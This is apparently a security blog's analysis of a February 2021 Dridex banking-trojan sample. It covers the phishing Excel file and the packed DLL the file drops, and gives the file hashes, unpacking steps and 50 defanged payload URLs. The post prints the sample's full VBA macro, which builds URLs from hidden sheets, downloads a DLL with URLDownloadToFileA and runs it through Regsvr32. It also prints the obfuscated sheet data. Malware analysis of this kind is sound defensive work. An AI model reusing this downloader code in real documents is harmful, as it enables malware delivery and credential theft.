Dridex Malware Analysis [8 Feb 2021]

Dridex “also know as Bugat and Cridex” is a form of malware banking trojan and infostealer that operated by criminal group referred to as “Indrik Spider”. Dridex specializes in stealing banking credentials via systems that utilizes macros from Microsoft office products like Word and Excel. In previous recoded incident the threat actors have used Dridex to hit high value targets with ransomware [2].

A new Dridex sample has been found today Feb 8, 2021. What’s been know about threat actor is their use of similar techniques and procedure in their campaigns and this sample is no exception. There is slight update that been found when analyzing this sample, but the whole procedure and technique is the same. I’ve been referred to this sample by a security researcher Moto_Sato [3] and the sample been collected from AnyRun[4]. In this analysis will take a glimpse of the threat actor new update, artifacts, and indicators. For full analysis of the similar Dridex sample check the previous post on this blog. The previous sample been discovered on Feb 1, 2021. In this post will use dynamic analysis to download the sample and statically debugging the samples to check out the results.

[Figure 1] Excel file in VT
[Figure 2] DLL file in VT
File NameSHA265File Size
INV4362145800.xlsmbc1d978695e3dc1666923fa13de923870a7604375d57bb6771e2f4bcd8ae8d56
73.25 KB
gwftgmyy.dlle559d8d2e789cac8391fc3286b0c80efe0fc9a3bfaac15b124e7520ed0f0a02e471.00 KB
[Table 1] Basic Properties of the malicious sample, Ref: any.run and VT

malware analysis

  1. Excel File

Threat actor send a phishing email to a victim in with attached Microsoft Excel file “INV4362145800.xlsm” with locked macro. It requires enabling macro in order for malicious file to be downloaded. The cells in the background are not empty they contains characters. There are also three hidden sheets that contains the rest of the characters that forms 50 set of URLs that contains the payload.

Using EvilClippy to unload the locked macro and been able to extract the VBA code. The same tool has been used by the threat actor to avoid detection. When observing the code below and comparing with the previous one, there’s little update been done but the overall is still the same.


#If VBA7 And Win64 Then
    Private Declare PtrSafe Function xsmart_card Lib "urlmon" _
      Alias "URLDownloadToFileA" ( _
        ByVal pCaller As LongPtr, _
        ByVal szURL As String, _
        ByVal szFileName As String, _
        ByVal dwReserved As LongPtr, _
        ByVal lpfnCB As LongPtr _
      ) As Long
#Else
    Private Declare Function xsmart_card Lib "urlmon" _
      Alias "URLDownloadToFileA" ( _
        ByVal pCaller As Long, _
        ByVal szURL As String, _
        ByVal szFileName As String, _
        ByVal dwReserved As Long, _
        ByVal lpfnCB As Long _
      ) As Long
#End If


Function commercial_e(ll As String, lo As Integer)
commercial_e = Mid(ll, lo, 1)
End Function

Function prv_and_next(vvf As Variant) As String
Randomize: rr = 2 - 1: prv_and_next = vvf(Int((UBound(vvf) + rr) * Rnd))
End Function
Sub hello_messages()
figiner = Split(RTrim(dear_clients), v_time_year(")"))
Sheets(1).Cells(3, 1).Name = "travel_" & "T"
etnas = Split(figiner(1), v_time_year("+"))
For A = 0 To UBound(etnas) - LBound(etnas) + 1
On Error Resume Next
Sheets(1).Cells(3, 1).value = "=" & etnas(A)
Debug.Print ((((Run("" & "travel_" & "" & "T")))))
If A = 12 Then A_min_1 = court_and_four:
If A = 14 Then
Msira = court_and_four
xsmart_card 0, copy_data_a(prv_and_next(Split(figiner(0), v_time_year("S") & "s"))), A_min_1 & "\" & Msira, 0, 0
End If
Next
End Sub
Function court_and_four()
court_and_four = Sheets(1).Range("C1:C5").SpecialCells(xlCellTypeConstants)
End Function
Public Function copy_data_a(jk As String)
copy_data_a = Right(jk, Len(jk) - 1)
End Function
Function dear_clients()
Dim hmouses As String
Dim fig_1_1 As String: Dim value_cargos As String
Dim u As Integer: hmouses = help_resource(4)
fig_1_1 = help_resource(3): value_cargos = help_resource(2)
For u = 1 To Len(hmouses)
microtech = microtech & commercial_e(hmouses, u) & commercial_e(fig_1_1, u) & commercial_e(value_cargos, u)
Next
dear_clients = RTrim(microtech)
End Function
Function help_resource(d As Integer)
For Each ds In Sheets(d).UsedRange.SpecialCells(xlCellTypeConstants): world_docs = world_docs & ds: help_resource = world_docs
Next
End Function
Function v_time_year(df As String)
v_time_year = Replace(String(4, "Z"), "Z", df)
End Function

After little cleaning, the characters in sheets are as below

Sheet 1 
qt:h.moy9.rS8t:dp.bt./eziSsts/micqteoz8o.rS8t:csf.gun8kiSsts/pcc./7vzSShp/bi.ao.my5zSShp/reienoadv7zSShp/dsi/ih.rS4t:dhioteliso/hb.pSlt:tasokimtSShp/ateqlrmoeqg8tSShp/dtv.mma1aSsts/aerosrnaetSShp/isdnnaesri.trr6.rS4t:ihheml.mdqfiSsts/menoa5v.pSit:gcodhnctnoft.pS6t:mlesorcxj.pS0t:soetaesri.trpcciSsts/a.iczjhp.rS2t:eotenoawhntSShp/peheni7.pSat:plnagtootrghnozSShp/a.tu./s3.rS5t:heter.m61jtSShp/e.swc/9f5iSsts/ra.mra66aSsts/asraaows.rSzt:stotn.mzezaSsts/tub.zo5zSShp/or.v./kytSShp/ysatnn.mrdzvtSShp/oesidood6tSShp/hohplwc/cx5iSsts/yelbugvdrSShp/oaoeaeisnl5qiSsts/teoc.muhtSShp/uaogsi./s9iSsts/nreeb.m75tSShp/tenoa9g9rSShp/teaytaromp.rS9t:vasowb.pS9t:naolenoa2h.pSut:bgoionnimc7.pS6t:rhtshmmiuvo.rS7t:iot.mtfcaSsts/ittatc/eoaSsts/gstsl../dtiSsts/beannogu.pS0t:hhnoc.m2nzSShp/usrersosiv.r)ENEclCR0)+ENEm,"+S.M"0")+FSMREC""EWKA() LEAE++TA(0""+CC.YR)+ENEh,l++NLETE+S.M""O++TA(hf"hh"E&&u&)+ENEwb""kl)+ENEb,FG.RPE3(N"an,TOSC2,-)La&0Tclm&0+S.L(,)+ENEa,FCRA(29&ARD*+)H(N)67CRA(29&ARD*+)H(N)67CRA(29&ARD*+)A(8).l++TAE2b+CLe&,"hf&"AACCm00ph","kgro"s&&,0+FELEAE
=============================================================
Sheet 2
hp/cc./vzrSShp/rawsefg1.pSet:ecn5ni.mho4rSShp/ls7o./5z.pSot:a.xocrrciSsts/itsrjc/gfiSsts/orql../uaxiSsts/e.tcdotSShp/ranvisuo.bd39zSShp/eb.mvluaSsts/po.uii../z36aSsts/brec/k7.rSrt:asmis.gaptaSsts/voetanncibn./e7rSShp/.eisuic/ps.pS3t:btl../iuzSShp/c...roua.mhwzSShp/a.fo.golqzSShp/urdvnncibn./wr.pSvt:msenoa51wrSShp/nvel../qbtaSsts/.ae./jqzSShp/om.niousosrufyiSsts/ktutew6trSShp/akecic/twuaSsts/sraaoqi9.pSbt:kkcc./f2.rSct:snhai.mm0rSShp/o-litc/42.rSnt:b.oab/o9iSsts/ptfackf8aSsts/uehtyac./1cuaSsts/nrut.mgfeaSsts/iroiosohtd.pSst:p.vl./aojaSsts/cnrnlrc./hy.pSyt:getpac/k4aSsts/ssli.ict9.pSpt:yio.hic/fiaSsts/2l../7lgaSsts/u.dmit.m3vtSShp/kl.meozSShp/oloel../x6zSShp/l.gtnlen4hczSShp/am-saiydrrptSShp/nvoc/jk.rSqt:oegeydonp.rSgt:sama.iczu8.pSrt:grllt./jmzSShp/ildaoc/6miSsts/bcgxe.mdzxt))TA(i"H(1++TA(A")+ENEh"\++(NB(AHd,TOSC1),O(L)+S.M""3)+AEK(U++TA(kcl+CC.YR)+ENEv,"+S.M"gw,"klxh"th++TA(e"S&&l++TA(bLTEWKA()FDRmgG.RPE311&olh&"i&ph)+EVUCb++TA(bLTH(N)67CRA(29&ARD*+)H(N)67CRA(29&ARD*+)H(N)67CRA(29,N)+&d"+S.L(,)+A(go"&gw",&&C"A,&"kn"&&s"0  ba0)+I.O(L)
=============================================================
Sheet 3
ts/xocbh0aSsts/ulei2rigzSShp/dli.occ/8ldaSsts/ao5rakbxzSShp/ph.mop6.pSdt:alamtooq9.pSjt:ppt.iczz5h.pS5t:ivse7vcaSsts/s.navotnmiytjiSsts/hic/0h.rSwt:csneibuckwyp.rSet:aaalougprSShp/ldapao/g1.rSkt:dirae.tautaebcs8aSsts/tcnesmonyezSShp/c.icztieiSsts/pcicosric/9giSsts/ijfno/ljoiSsts/pte.tautaebe3szSShp/dal../1u7aSsts/na.iczq6b.rS1t:wrdrikgliSsts/uapaopl-u./do.pS1t:fsuruuejbaSsts/regirohev.rSft:ttai.mppjzSShp/ibaotgwbtSShp/pi.swc/vfaSsts/fsuovol7xrSShp/oqcoivf.pS3t:soeelor6.rStt:eplaiarota8z.rStt:cvtnec/0s.rS2t:plt.lw.mnf1zSShp/aleaehrm.rSmt:dm.itsveikgmzSShp/ilrilojx.rS7t:bcceodtlxezSShp/epjtasoho.rSht:b.iczyr8.rSxt:vbflovoc/ogaSsts/sec/kaiSsts/cnd.iczobqiSsts/ocnioi./j5uiSsts/caaui../v0gaSsts/faroviirSShp/rnawl.mr1tSShp/elelenoa12zSShp/aiveirxhziSsts/gardcoku.pSwt:ceaopsc/25la)S.M"l,A1)+S.M""J++TA(k,"+IIUESR(oG.RPE),CSFS)+ENEo,2++NLETE+S.M""i)+AEK(U++TA(0")+ENEodw"&&l"kc"k+S.M"g,hh""+S.M""E(TOSC2,I(oi"EWKA()))"c"k"&l""k++TAE2b+S.M""E(ARD*+)H(N)67CRA(29&ARD*+)H(N)67CRA(29&ARD*+)H(N)67RD*5"l)+EVUCa++Lwb0SodwAmm"C&,v"&&"rh"v&,-"bb,++LCSFS 

When debugging the VBA code in Microsoft Visual Studio the first thing to look for is the set of URL list. There are 50 URL been found in this sample the full URL set in Appendix -A below. The code choses a random URL from this list to download the malicious DLL. The code also forms a random name for the DLL and run it in Regsvr32.exe.

When doing dynamic analysis the second stage DLL is downloaded from the malicious URL to %TEMP% folder and loaded in Regsvr32.exe process. The next step would be analyzing the DLL file and see if it’s similar to the previous samples

2. DLL File

It seems that all DLL files downloaded from the URLs are similar and the only difference is the DLL name. The first look at this DLL file “gwftgmyy.dll” it seems to be a bit optimized than the pervious sample [6]. The sample seems to be compiled in 2014!

When looking at the IDA bar to observe the amount of code in comparison with the size [471.00KB] and looking at the gray area, it seem packed

The threat actor been using same technique of Self-Injection just like before. Quick debugging using x32dbg to unleash the packed file with setting breakpoint on <VirtualAlloc> and <VirtualProtect>. As per this method, the PE file requires to allocate a memory space first using VirtualAlloc.

The second step would be hitting VirtualProtect in order to unleash the stub and perform the self-injection technique

To dump the unpacked version, using ProcessHacker and locate the same address of EDX register.

The unpacked binary requires fixing Section Headers in Pe-bear in order to get the imports library by matching Raw addresses with Virtual ones.

Finally, the unpacked file seems to be the same one discovered in the previous analysis with similar stamps.

File NameSHA265File Size
715c0000_Fixed.bin20bf0a8d139b5e517799339c3db2169ead923e65259ac10eb4ba026b2a4d2246516.00 KB
[Table 2] Basic Properties of Unpacked file submitted to VT [7]

Appendix-a

DO NOT click at any of the URLs

 hxxps://hcx[.]com[.]co/byvh9z0[.]rar 
 hxxps://drupal[.]website2[.]fr/gie1gz[.]zip 
 hxxps://edmclinic5[.]qnotice[.]com/zh88olo4d[.]rar 
 hxxps://classof75[.]org[.]au/kn5b8zxk[.]zip 
 hxxps://app[.]hcx[.]com[.]co/rp7r6vc[.]zip 
 hxxps://abilita[.]smartojo[.]com/qyg95f[.]zip 
 hxxps://propertiq[.]elin[.]co[.]za/zdu5vah7x[.]zip 
 hxxps://idevs[.]site/c7idvhoc[.]tar 
 hxxps://drsha[.]innovativesolutions[.]mobi/dyh3tb9j[.]zip 
 hxxps://tehabis[.]com/kv0ilhmu[.]tar 
 hxxps://tehabis[.]com/kv0ilhmu[.]tar 
 hxxps://capstone[.]equilibrium[.]co[.]ke/wqzyg3p86[.]tar 
 hxxps://adbatravel[.]com/umkga7p1[.]rar 
 hxxps://alasdemariposas[.]org/nagap1et[.]tar 
 hxxps://divisordeantena[.]antenascuritiba[.]net[.]br/cres678[.]rar 
 hxxps://i[.]thechinesemuslim[.]com/ndpyqsef[.]zip 
 hxxps://bcmt[.]elin[.]co[.]za/t5iivue[.]zip 
 hxxps://gcpc[.]co[.]id[.]chronoscurtain[.]com/fh9twg[.]zip 
 hxxps://mail[.]jeffsono[.]org/colxljjqo[.]zip 
 hxxps://suportedetv[.]antenascuritiba[.]net[.]br/epw3crsc[.]zip 
 hxxps://mdasa[.]elin[.]co[.]za/j51h1upw7[.]rar 
 hxxps://ennovate[.]elin[.]co[.]za/qwq6hbbnt[.]tar 
 hxxps://wp[.]readhere[.]in/kijg7ql[.]zip 
 hxxps://poulman[.]panagiotopoulos-tours[.]gr/hudnfooy[.]zip 
 hxxps://faks[.]tuturutu[.]eu/wes6j3tb[.]rar 
 hxxps://hareketegecirir[.]com/h6te1wvju[.]tar 
 hxxps://test[.]rasaiwa[.]com/qp9ipf9j5[.]zip 
 hxxps://kirkbaca[.]com[.]tr/gafw62b6[.]tar 
 hxxps://spanish[.]rasaiwa[.]com/wmvs0f[.]rar 
 hxxps://soft-solutiontv[.]com/lz47e2xz[.]rar 
 hxxps://bot[.]quocbao[.]biz/voof59[.]zip 
 hxxps://soporte[.]feval[.]co/krkf6y8[.]tar 
 hxxps://eyupselahattinyanar[.]com[.]tr/ad18zczvu[.]tar 
 hxxps://convertsunited[.]com/og0dfs6e[.]tar 
 hxxps://philortho[.]pillowws[.]com/hnctfxd15[.]zip 
 hxxps://pay[.]levellab[.]eu/hgarvomdj[.]rar 
 hxxps://docman[.]orientalservices[.]in/klhg5ymq[.]zip 
 hxxps://giteletropical[.]com/jukxh4[.]tar 
 hxxps://buscascolegios[.]diit[.]cl/txs9e9[.]zip 
 hxxps://yeniproje[.]tehabis[.]com/h7fo5i[.]tar 
 hxxps://bt2[.]elin[.]co[.]za/y97rgl89g[.]rar 
 hxxps://vtube[.]fadlymotivator[.]com/m3opvg[.]tar 
 hxxps://vksales[.]com/wekboa[.]zip 
 hxxps://nocalnoodle[.]elin[.]co[.]za/o2xbh6q[.]zip 
 hxxps://blog[.]cognitiononline[.]in/m4jch57cu[.]zip 
 hxxps://rachmat-assuhaimi[.]my[.]id/urvvr0opg[.]tar 
 hxxps://infovator[.]com/vtjifkic[.]rar 
 hxxps://orientgatewayltd[.]com/nrep1o[.]tar 
 hxxps://segalsmetals[.]elin[.]co[.]za/u1d82t[.]zip 
 hxxps://gabrielvalentin[.]ro/xgjhumz[.]zip 
 hxxps://highlandroadcoc[.]com/k26unm[.]zip 
 hxxps://cubescargoexpress[.]com/sd2iz5vxl[.]tar 

References

[1] Indrik Spider, https://malpedia.caad.fkie.fraunhofer.de/actor/indrik_spider

[2] Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware, https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/

[3] Security Researcher, https://twitter.com/58_158_177_102

[4] Excel Sample, https://app.any.run/tasks/baaf23e7-a3d1-42c1-b4b4-fbb827b2febc/#

[5] EvilClippy Github repository, https://github.com/outflanknl/EvilClippy

[6] Dridex DLL VT, https://www.virustotal.com/gui/file/26a659ec56c7bd7b83a2f968626c1524bda829e0fefff37ecf4c4fb55ad158e3/detection

[7] unpacked DLL, https://www.virustotal.com/gui/file/20bf0a8d139b5e517799339c3db2169ead923e65259ac10eb4ba026b2a4d2246/details

One thought on “Dridex Malware Analysis [8 Feb 2021]

Comments are closed.